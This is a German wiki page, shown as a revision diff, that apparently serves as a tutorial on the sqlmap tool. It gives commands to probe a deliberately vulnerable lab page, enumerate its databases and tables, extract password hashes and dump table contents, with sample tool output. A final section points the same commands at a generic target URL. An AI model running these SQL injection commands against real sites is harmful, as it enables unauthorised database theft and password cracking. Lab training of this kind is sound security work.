Sqlmap Anwenden: Unterschied zwischen den Versionen

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen
Zeile 22: Zeile 22:
 
*sqlmap "opfer.secure.local/unsafe.php?search=test&submit=Suche" --passwords
 
*sqlmap "opfer.secure.local/unsafe.php?search=test&submit=Suche" --passwords
 
*Interaktiv kann man hier einen Dictionary-based Angriff starten
 
*Interaktiv kann man hier einen Dictionary-based Angriff starten
 +
=Dump der Datenbanktabellen=
 +
*sqlmap "opfer.secure.local/unsafe.php?search=test&submit=Suche" -D sql_injections --dump
  
 
=Aufruf des Wizards=
 
=Aufruf des Wizards=

Version vom 12. August 2021, 15:06 Uhr

Augabe aller Parameter und Optionen

  • sqlmap -hh

Angriff und Auflisten der Datenbanken

  • sqlmap "opfer.secure.local/unsafe.php?search=test&submit=Suche" -dbs
Infos
[16:48:08] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 5.5.9, Apache 2.4.7
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[16:48:08] [INFO] fetching database names
available databases [4]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] sql_injections

Auslesen der Tabellen der Datenbank

  • sqlmap "opfer.secure.local/unsafe.php?search=test&submit=Suche" -D sql_injections --tables

Auslesen der Passwort-Hashes aus der Datenbank

  • sqlmap "opfer.secure.local/unsafe.php?search=test&submit=Suche" --passwords
  • Interaktiv kann man hier einen Dictionary-based Angriff starten

Dump der Datenbanktabellen

  • sqlmap "opfer.secure.local/unsafe.php?search=test&submit=Suche" -D sql_injections --dump

Aufruf des Wizards

  • geführt und interaktiv
  • sqlmap --wizard

URL angreifen / auf Schwachstellen testen

  • URL je nach Struktur der interessanten Seite
  • sqlmap www.opfer.de/index.php?id=1

Ausgabe der Datenbanken - falls angreifbar

  • sqlmap www.opfer.de/index.php?id=1 --dbs